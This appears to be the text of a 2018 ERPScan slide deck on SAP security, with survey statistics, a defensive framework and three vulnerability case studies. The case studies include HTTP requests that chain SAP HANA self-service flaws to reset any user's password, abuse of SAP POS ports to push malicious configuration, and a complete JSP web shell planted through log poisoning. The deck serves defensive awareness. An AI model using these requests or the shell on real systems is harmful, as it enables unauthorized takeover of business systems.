SAP Cybersecurity 2018
Cyber attack kill chain

THE CHALLENGES WE FACE

THE CISO RESPONSIBILITIES
Just detecting/preventing initial intrusion:
• Network security
• Web Application security
• Endpoint security
• Identity and access governance
• Threat Detection and Incident response
That’s where a real attack happens:
• Business application security
WHY
Approach to SAP security should change too
1. World has changed
• increased connectivity
• boundless companies
2. SAP has changed
• cloud and mobile access from anywhere
• global platform rather than legacy tool
3. Attackers have changed
• hackers are moving up the application stack
• Every year we see major incidents with SAP systems
Source: ERP Cybersecurity Survey 2017
USIS DATA BREACH
The story of a small SAP vulnerability
Source: Owner of USIS files for bankruptcy. The Herald
Source: USIS cuts more than 2,500 jobs after losing contracts in wake of cyberattack. The Washington Post
ERP SECURITY
Q: What are the most critical business applications?
Business Intelligence (BI/BW) 36% | Supply Chain Management 32% | Product Lifecycle Management (PLM) 30% | Enterprise Asset Management (EAM) 27% | Supplier Relationship Management (SRM) 18% | Manufacturing Execution System (MES) 18%
Q: What kind of business applications are used in your company?
Source: ERP Cybersecurity Survey 2017
RADAR SCREEN – WHAT’S NEXT ON THE HORIZON?
• Breach/Attack simulation
• Digital supply chain, risk assessment services
• Encryption by default, encryption everywhere
• Anti-fraud/bot protection platforms (UI protection)
• ERP-specific security/business-critical application security
• Data flow discovery, monitoring and analytics
• Bug bounty programs, crowdsourced and pen testing aaS
• Cloud firewalls and UTMs for branch office and SOHO
• ERP + EDR merger = advanced endpoint protection
• IoT/OT discovery, visibility, monitoring and deception
• SecOps chat
Source: Top New and Cool Technologies and Representative Vendors in Security, 2017. Gartner Risk Management Summit 2017 by Neil MacDonald
HOW IMPORTANT
Cyberattacks on ERP
Q: How will the number of cyberattacks against ERP Systems change within the next 2-3 years?
Source: ERP Cybersecurity Survey 2017
SAP SECURITY
Why hacking SAP?
• Espionage: To steal financial or HR data, supplier and customer lists or disclose corporate secrets.
• Sabotage: To cause denial of service, counterfeit financial records and accounting data, access the technology network (SCADA).
• Fraud: To carry out false transactions, modify master data.
SAP ATTACK
How much does it cost?
Source: ERP Cybersecurity Survey 2017
SAP SECURITY
How many vulnerabilities were found?
• 4000+ in all SAP products
• 2800+ in SAP NetWeaver ABAP based systems
• 1500+ in basic components which are the same in every system
• 400+ in ECC modules
More details here: https://goo.gl/Hr144b
WHY DO ORGANIZATIONS LACK ERP SECURITY?
Q: Which of the following incidents related to SAP Security have you heard about most?
Source: ERP Cybersecurity Survey 2017
RESPONSIBILITY
Q: Who will be responsible if your ERP System is breached?
Q: Who is the person most accountable if your organization has a SAP breach?
Source: Uncovering the Risks of SAP Cyber Breaches. Ponemon Institute
Source: ERP Cybersecurity Survey 2017
Vulnerabilities
3 latest examples

Vulnerability 1: SAP HANA
USS
User-Self-Service
• Available since SPS09
• Deactivated by default
• Speeds up the following processes:
  o Forgot your password?
  o Request account
• Administrators must approve the accounts to activate them
USS
Create new user attempt
```
POST /sap/hana/xs/selfService/user/selfService.xsjs HTTP/1.1
Host: <host>:<port>
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 137
DNT: 1
Connection: close

{"action":"createNewUser","username":"<username>","email":"<email>","x-sap-origin-location":""}
```
• The user self-service tools of SAP HANA contain vulnerabilities. An unauthenticated user might be able to impersonate other users, including administrative accounts.
• An attacker needs a security token to reproduce this vulnerability. The attacker must send a request to create a user, and the server will send the security token via e-mail.
USS
• After the attacker receives the security token, he or she can change the password of any user with the following request
```
POST /sap/hana/xs/selfService/user/selfService.xsjs HTTP/1.1
Host: <host>:<port>
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: <length>
DNT: 1
Connection: close

{"pwd":"<pass>","confirmPwd":"<pass>","securitytoken":"<token>","securityQues":"1","securityAns":"{\"username\":\"SYSTEM\",\"time\":\"2020-01-10T22:10:06,024Z\"}|","action":"savePassword"}
```
• Changing any user’s password is possible with a combination of the two vulnerabilities
• The attacker can inject additional variables into the JSON request, and the JSON parser will parse and save them into USS security storage
• Additional variables will be injected into the SQL request from USS security storage without any checks
Source code
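One way to close the path the two bullets describe (extra JSON keys accepted by the parser, stored, then reaching SQL unchecked) is to allowlist keys per action and bind stored values as parameters. This is an added Python example, not code from SAP or from the original slides; the allowed key sets are taken from the two requests above, and the SQLite table is a constructed stand-in for the USS security storage.

```python
import json
import sqlite3

# Allowed JSON keys per USS action, taken from the two requests above.
# Any other key is rejected instead of being written to storage and later
# reaching SQL (the two chained defects described on the slide).
ALLOWED_KEYS = {
    "createNewUser": {"action", "username", "email", "x-sap-origin-location"},
    "savePassword": {"action", "pwd", "confirmPwd", "securitytoken",
                     "securityQues", "securityAns"},
}


def validate_uss_body(raw_body):
    """Parse a request body and return (ok, action, fields_or_error).

    Rejects non-object JSON, unknown actions, keys outside the allowlist
    for that action, and non-string values.
    """
    try:
        body = json.loads(raw_body)
    except ValueError:
        return False, None, "body is not valid JSON"
    if not isinstance(body, dict):
        return False, None, "body must be a JSON object"
    action = body.get("action")
    if not isinstance(action, str) or action not in ALLOWED_KEYS:
        return False, None, "unknown action: %r" % (action,)
    extra = set(body) - ALLOWED_KEYS[action]
    if extra:
        return False, action, "unexpected keys: %s" % sorted(extra)
    if not all(isinstance(v, str) for v in body.values()):
        return False, action, "all values must be strings"
    return True, action, body


def store_request(fields, conn=None):
    """Persist allowlisted fields with bound parameters, never by building
    the statement from request data. The table is a constructed stand-in
    for the USS security storage. Returns the number of stored rows."""
    conn = conn or sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE IF NOT EXISTS uss_storage (k TEXT, v TEXT)")
    conn.executemany("INSERT INTO uss_storage (k, v) VALUES (?, ?)",
                     sorted(fields.items()))
    return conn.execute("SELECT COUNT(*) FROM uss_storage").fetchone()[0]
```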
Vulnerability 2: How to buy a MacBook for $1
[Diagram: Xpress Server and POS clients]
4 FACTS ABOUT SAP POS CAN HELP US MAKE A TRICK
1. Store configurator creates config files and Xpress Server will apply them if it finds a ”newparm.trg” file in the special directory.
2. We can write any data we want to any file on Xpress Server using port 2200.
3. POS Clients (Terminals) update their parameters after opening.
4. We can close and open POS Terminals using telnet and port 2202.
[Diagram: Attacker, Xpress Server (PORT 2200, PORT 2202), POS Client, Database]
1 Evil Configuration files
2 Trigger file ”newparm.trg”
3 Apply new settings
4 Write some of them in database
5 Close Terminal
6 Close Terminal
7 Open Terminal
8 Open Terminal
9 Get evil Configuration files
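A defender can watch for the network footprint of the nine steps above: the chain needs port 2200 on the Xpress Server to push files and port 2202 to close and reopen terminals. This is an added Python example, not part of the original slides; the flow records, the Xpress Server address and the hosts allowed to use each port are constructed placeholders for a real site's firewall or NetFlow export and inventory.

```python
import ipaddress
from collections import defaultdict

# Constructed flow records "time src dst dport", as a firewall or NetFlow
# export would yield them; not captured from a real store network.
SAMPLE_FLOWS = """\
2018-03-01T09:00:01 10.10.5.20 10.10.5.2 2200
2018-03-01T09:00:03 10.10.5.20 10.10.5.2 2200
2018-03-01T09:01:10 10.10.9.77 10.10.5.2 2200
2018-03-01T09:01:12 10.10.9.77 10.10.5.2 2202
2018-03-01T09:01:40 10.10.5.31 10.10.5.2 2202
"""

# Assumed site inventory (placeholders): the Xpress Server, the store
# configurator allowed to write files over 2200, and the terminal allowed
# to use the terminal-control port 2202.
XPRESS_SERVER = ipaddress.ip_address("10.10.5.2")
ALLOWED_BY_PORT = {
    2200: {ipaddress.ip_address("10.10.5.20")},
    2202: {ipaddress.ip_address("10.10.5.31")},
}


def parse_flow(line):
    ts, src, dst, dport = line.split()
    return ts, ipaddress.ip_address(src), ipaddress.ip_address(dst), int(dport)


def find_suspicious_flows(text):
    """Return alerts (ts, src, dport, reason) for connections to the Xpress
    Server's ports 2200/2202 from hosts not allowed to use them, plus one
    alert per source that touched both ports, the pattern of the chain above."""
    alerts = []
    ports_by_src = defaultdict(set)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, dst, dport = parse_flow(line)
        if dst != XPRESS_SERVER or dport not in ALLOWED_BY_PORT:
            continue
        ports_by_src[src].add(dport)
        if src not in ALLOWED_BY_PORT[dport]:
            alerts.append((ts, str(src), dport, "source not allowed on port"))
    for src, ports in ports_by_src.items():
        if ports == {2200, 2202}:
            alerts.append(("", str(src), 0, "same source used both 2200 and 2202"))
    return alerts
```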
Vulnerability 2: How to steal all CRM accounts
SAP REDWOOD APP
One of the thousands

SAP REDWOOD APP
Source code

REDWOOD APP
Directory traversal

CRM ADMIN CONSOLE

CRM LOGGING CONFIGURATION
EXAMPLE OF EVIL CODE
Typical .jsp shell
```
<%@ page import="java.util.*,java.io.*"%>
<%
if (request.getParameter("cmd") != null) {
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    out.println("<PRE>");
    while (disr != null) {
        out.println(disr);
        disr = dis.readLine();
    }
    out.println("</PRE>");
}
%>
```
WRITING EVIL CODE
By sending an HTTP request

THE EVIL CODE IN THE LOG FILE

COMMAND EXECUTION
With help of the evil code
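The chain on these slides has two defender checkpoints: the logging configuration must not accept a path that escapes the log directory, and log content should never carry server-side script tags. This is an added Python example, not code from SAP or from the original deck; the base directory, file names and log lines are constructed, and the marker patterns are illustrative rather than a complete signature set.

```python
import os
import re

# Markers of JSP server-side code that have no business in an access or
# application log; their presence suggests a poisoned log such as the
# .jsp shell shown above. Illustrative patterns, not a full signature set.
SCRIPTLET_MARKERS = re.compile(r"<%@?|<jsp:|Runtime\.getRuntime\(\)\.exec", re.IGNORECASE)


def safe_log_path(base_dir, requested):
    """Resolve a configured log file name under base_dir and refuse any
    result that escapes it (the directory traversal used on the slides to
    place a poisoned log where it gets served). Returns None when refused."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def find_poisoned_lines(log_text):
    """Return (line_number, line) for every log line carrying a scriptlet marker."""
    return [(no, line) for no, line in enumerate(log_text.splitlines(), 1)
            if SCRIPTLET_MARKERS.search(line)]


# Constructed sample: two ordinary access-log lines and one whose request
# path carries a scriptlet, the trace a poisoning attempt leaves behind.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2018:10:00:00 +0000] "GET /crm/index.html HTTP/1.1" 200 512
10.0.0.5 - - [01/Mar/2018:10:00:02 +0000] "GET /crm/login HTTP/1.1" 200 1024
10.0.0.9 - - [01/Mar/2018:10:00:05 +0000] "GET /<%@ page import=java.io.* %> HTTP/1.1" 404 0
"""
```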
Statistics
The most vulnerable industries

MOST VULNERABLE INDUSTRIES
[Chart: 46% / 30% / 15%]
• An average company using SAP has 35% of security parameters configured unsafely
• Manufacturing companies fail in Patch Management: more than 40% do not implement SAP Security Notes
• IT industry fails in encryption: 90% of companies do not implement SSL/SNC for RFC connections
MOST VULNERABLE COMPONENTS
>70% OF COMPANIES HAVE CRITICAL VULNS
• Message Server
• Gateway (35% of companies)
• MMC (45% of companies)
• Host Control (5% of companies)
• Enqueue (13% of companies)
USER SECURITY
Profile:
• ~55 users have the SAP_ALL profile assigned
• ~20 RFCs use default users (SAPCPIC, TMSADM, EARLYWATCH, …)
Passwords:
• 10% of passwords are vulnerable to dictionary attacks
• In most systems the default length is 6 chars
• 91% of Oil & Gas companies didn’t configure complexity requirements at all
• 63% of all companies allow never-expiring passwords
% of systems with default passwords: SAP* 2% | DDIC 23% | TMSADM 32% | SAPCPIC 54%
99%: in audits we’ve found at least one SAP system with default users/passwords!
ENCRYPTION
HTTPS: 83%
P4SEC: NEVER!
SNC: 37%! 90% of IT companies don’t use encryption to protect RFC at all
Only in 3% of all cases does the SAP system validate clients’ certificates
LOGGING
SAP ABAP Security Audit Log: user actions (logons, access to reports and tables, executions of transactions). Enabled in 57% of systems. Maximum audit log file size is less than 200M
SAP ABAP HTTP logs (ICM/MS/WebDispatcher): attacks (SQL Injection, XSS, XXE, RCE, DoS, Directory Traversal…). ICM: enabled in 38% of systems; MS: enabled in 27% of systems; WD: enabled in 23% of systems
Gateway: network actions, RFC actions, dynamic parameter changes. Enabled in 15% of systems
Enable all logs, set a big enough file size (~2 Gb), archive and rotate logs
RECOMMENDATIONS
Oil & Gas, Energy, Manufacturing industries adapt slowly:
• Delayed patching
• Lack of staff trained in security
• Delusion that SCADA systems are isolated from ERP systems
All:
• Lack of control
• Default users/passwords
• Disabled logs
IT & Finance industry:
• No encryption
• Custom development
• Ever-changing landscape
Pentest them to convince the management to implement security controls
Monitor user actions and systems’ behaviour
Scan systems’ security configurations
Defense
Business Case for SAP Cybersecurity Framework

CURRENT STATE
CISO / CIO
• Enterprise Security: vulnerability management
• SAP Basis: patching SAP systems
• SAP Security: segregation of duties
• IT Operations: monitoring SAP systems
Lack of effective oversight · Lack of visibility · Complexity · Poor integration · Slipped through the cracks
FUTURE STATE
CISO / CIO / CRO
• Enterprise Security: Vulnerability Management + Asset Management + Risk Management + Secure Development
• SAP Basis: Patching SAP systems + Incident Response + Mitigation + Improvements
• SAP Security: Segregation of Duties + Data Security + Secure Architecture + Awareness and Training
• IT Operations: Monitoring SAP systems + Threat Detection + User Behavior + Data Leakage
HISTORY
EAS-SEC
Gartner: Designing an Adaptive Security Architecture for Protection From Advanced Attacks
Source: https://www.gartner.com/doc/2665515/
SAP CYBERSECURITY FRAMEWORK
Category: PREDICT
Process: Secure Development
Purpose: To ensure security during SAP systems development and acquisition.
Outcomes:
• Security Requirements
• Development Standards and Processes
• Security Plans
Implementation steps:
1. Develop basic security requirements for the configuration of servers, networks, SAP applications and client stations
2. Create secure development standards and processes
3. Automate secure development processes
IMPLEMENTATION TIERS
[Chart: tiers 1, 2 and 3 with 50% / 80% / 99% and 3-6 months / 6-12 months / 12 months]
BENEFITS
SAP Cybersecurity Framework:
• Security Program
• Security Policies
• Security Plans
• Process Descriptions
• Technical Solutions

PREDICT
Understand SAP environment
PREDICT
Process: Purpose
• Asset Management: To communicate information about SAP assets, security category of the assets, rules of acceptable use and protection requirements
• Business Environment: To provide SAP business context, ensure cybersecurity continuity of SAP systems and address cybersecurity in supplier relationships
• Governance: To develop cybersecurity policies, roles, responsibilities and procedures to ensure SAP cybersecurity is understood and integrated into the organization’s operational and management processes
• Vulnerability Management: To provide cybersecurity assurance in SAP systems by assessing vulnerabilities and reducing attack vectors
• Risk Management: To make decisions on addressing possible adverse impacts from the operation and use of SAP systems
• Secure Development: To ensure security during SAP systems development and acquisition
VULNERABILITY MANAGEMENT
Purpose: To provide cybersecurity assurance in SAP systems by assessing vulnerabilities and reducing attack vectors
Implementation:
1. Regularly perform SAP security audits and penetration tests
2. Repeatedly scan SAP systems for vulnerabilities, recommend and track remediations
3. Monitor vulnerabilities, remediations and threats online from public and private sources and threat intelligence feeds
Outcomes:
• Scan Plans
• Scan Profiles
• Remediation Plans
PREVENT
Reduce the attack surface

PREVENT
Process: Purpose
• Access Control: To limit rights of authorized users and prevent unauthorized use of an SAP system
• Awareness and Training: To provide personnel and contractors cybersecurity awareness education and training to perform their duties and responsibilities
• Data Security: To enforce requirements for confidentiality, integrity and availability of information in SAP systems on the data layer
• Secure Architecture: To ensure security of all SAP solutions throughout all SAP components, connections, infrastructure and security controls
ACCESS CONTROL
Purpose: To limit rights of authorized users and prevent unauthorized use of an SAP system
Implementation:
1. Secure the network, servers and endpoint devices
2. Implement role-based access control to SAP functionality
3. Enforce Segregation of Duties controls according to business process rules
Outcomes:
• Access Rules
• Access Mechanisms
• Access Control Reports
ACCESS CONTROL. HOW TO CREATE A USER?
Ways to create a user in an SAP system:
1. Transaction SU01
2. Database table USR02
3. RFC function BAPI_USER_CREATE
4. Web exploit using the InvokerServlet feature and CTC servlet
Number of objects:
1. More than 300 000 transactions
2. More than 500 000 tables
3. More than 40 000 RFC functions
4. 500 known web exploits
DETECT
Monitor threats

DETECT
Process: Purpose
• Event Management: To collect information on SAP security related events
• Threat Detection: To detect attacks and possible threats to SAP systems
• User Behavior: To detect deviations of user behavior from the typical in SAP systems
• Data Leakage: To detect data leakages in SAP systems
EVENT MANAGEMENT. EVENT SOURCES
o SAP ABAP Security log
o SAP ABAP Audit log
o SAP ABAP HTTP log
o SAP ABAP ICM Security log
o SAP ABAP RFC log
o SAP J2EE HTTP log
o SAP HANA Security log
o SAP HANA log
More than 30 logs
Log Management Solutions
THREAT DETECTION
Purpose: To detect attacks and possible threats to SAP systems
Implementation:
1. Configure IDS/IPS systems to detect SAP attack signatures
2. Manually review SAP security events
3. Monitor potential attacks, security event combinations and anomalies
Outcomes:
• Threat Catalogue
• Threat Data Sources
• Threat Detection Rules
RESPOND
Investigate, take actions and improve

RESPOND
Process: Purpose
• Incident Response: To systematically respond to violation or threat of violation of SAP security policies and practices
• Clear Communications: To establish a structure for SAP security responsibility in a business and provide means for clear communications between its members
• Continuous Analysis: To continuously monitor the effectiveness of SAP security processes and provide insights into the state of SAP security
• Mitigation: To design and model changes to the security of SAP systems
• Improvements: To learn from external events and internal assessments of SAP security controls
MITIGATION. VIRTUAL PATCHING
THANK YOU
USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA 94301. Phone 650.798.5255
EU: Luna ArenA 238 Herikerbergweg, 1101 CM Amsterdam. Phone +31 20 8932892
EU: Štětkova 1638/18, Prague 4 - Nusle, 140 00, Czech Republic
Read our blog: erpscan.com/category/press-center/blog/
Join our webinars: erpscan.com/category/press-center/events/
Subscribe to our newsletters: eepurl.com/bef7h1
Alexander Polyakov, CTO